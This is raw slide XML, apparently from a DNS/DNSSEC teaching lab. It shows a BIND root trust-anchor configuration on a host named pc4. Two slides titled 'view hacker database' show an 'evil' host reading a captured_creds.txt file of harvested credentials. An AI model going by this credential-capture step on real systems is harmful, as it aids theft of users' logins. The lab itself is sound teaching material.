              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE6A173-06A4-E124-45B8-CB1886138B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4554" y="1107981"/>
            <a:ext cx="10479508" cy="5250682"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273948EF-0AFA-B910-71AB-71194B3BF3DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7180289" y="3912890"/>
            <a:ext cx="3612629" cy="1423607"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112759"/>
              <a:gd name="adj2" fmla="val -57942"/>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the resolver discards the response obtained and returns server failure, DNSSEC worked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28100854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93FCF-DFCB-4312-C7E7-A4AE716607E2}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40EEDF0F-6EDA-7B05-635E-34FF320094F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trust-anchors view</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA23B9F7-8494-9F96-153F-9FD21C90C151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pc4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>let's see the trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687919AB-5CE6-CE9B-BB14-F1E8ED662C70}"/>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AFAC2774-BE74-68D4-604B-553C85296223}"/>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7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625C6A2A-FB96-EF84-99A4-EA827DCE1E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2748056"/>
            <a:ext cx="10972799" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F50E487-3D30-7C05-9839-C14C4248F996}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="257206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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>trust-anchors { "." static-key 257 3 13 "wu8ma9EvxFhISJabP7+JOBwn/geejdepyV4WVi5Uv0Tn80KNQfpAuDeNhKEunT5pmUXjIx/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rkdOiK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xApdQNEg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=="; };</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56746262-566D-912A-319A-F999835CB647}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506"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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9434FA79-122A-AF0D-18B7-15652FB88390}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4BFCBC-9CE7-86D5-5CBD-9C4EB54D5055}"/>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2" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF63C4D5-D4B6-CFC2-14B2-E83DFEB84322}"/>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3" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51139FAC-6BEC-F0FE-7C7C-AB376656275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2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE02203E-77D3-FAE2-110E-F6C041AA1386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9071710" y="2332427"/>
            <a:ext cx="2782277" cy="415629"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33391"/>
              <a:gd name="adj2" fmla="val 214138"/>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trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16976764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00A12-E21A-78F1-A077-7AEA9D28855D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82431CB8-7E4C-2571-F17B-A34E4AAECC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC015EA-E5F5-1819-45D8-756B754DC154}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7DC013-4D2C-A94A-549F-2D34B67A0515}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE778110-45E5-B892-FC7C-17790C6A4C9A}"/>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D6453A03-F3EB-AE44-914A-EA9B92399B43}"/>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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0846F3-4D03-2924-BEF3-71F4E447FFB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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9218E761-09F6-D814-3AC9-8BA66AC9079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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1814E57D-0633-EED0-5E19-B83CE6B89B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC430BC-62C0-6AF8-F48C-721536EBB44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D169D8-41B4-2A79-E1E4-E4F67FA736CB}"/>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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1E2BC2-D870-AFFA-DC58-14E4D50EB9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31713587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9B9C8-6216-425A-C877-902928F23E5C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C128DD5-44DD-68F6-4E63-B2E95B4D3872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB8CCEC0-96FD-7A2E-F080-85BBA8AE13F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947B8ED-5F12-B64A-C2E9-A84BC2830F5B}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D336C1D3-4F53-106C-FD47-C7E6E7FF5211}"/>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30ABB985-7980-A9C1-7E23-09C3AEE5E14F}"/>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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A382EF47-9037-6342-13FD-DBFD78BE8693}"/>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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CDD81C-CE59-85E5-8A32-6638A505A6FB}"/>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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CC365B-7988-E017-AA24-F88407506037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FD8D6E-DA69-76A7-91A1-CB2E2BD1D742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
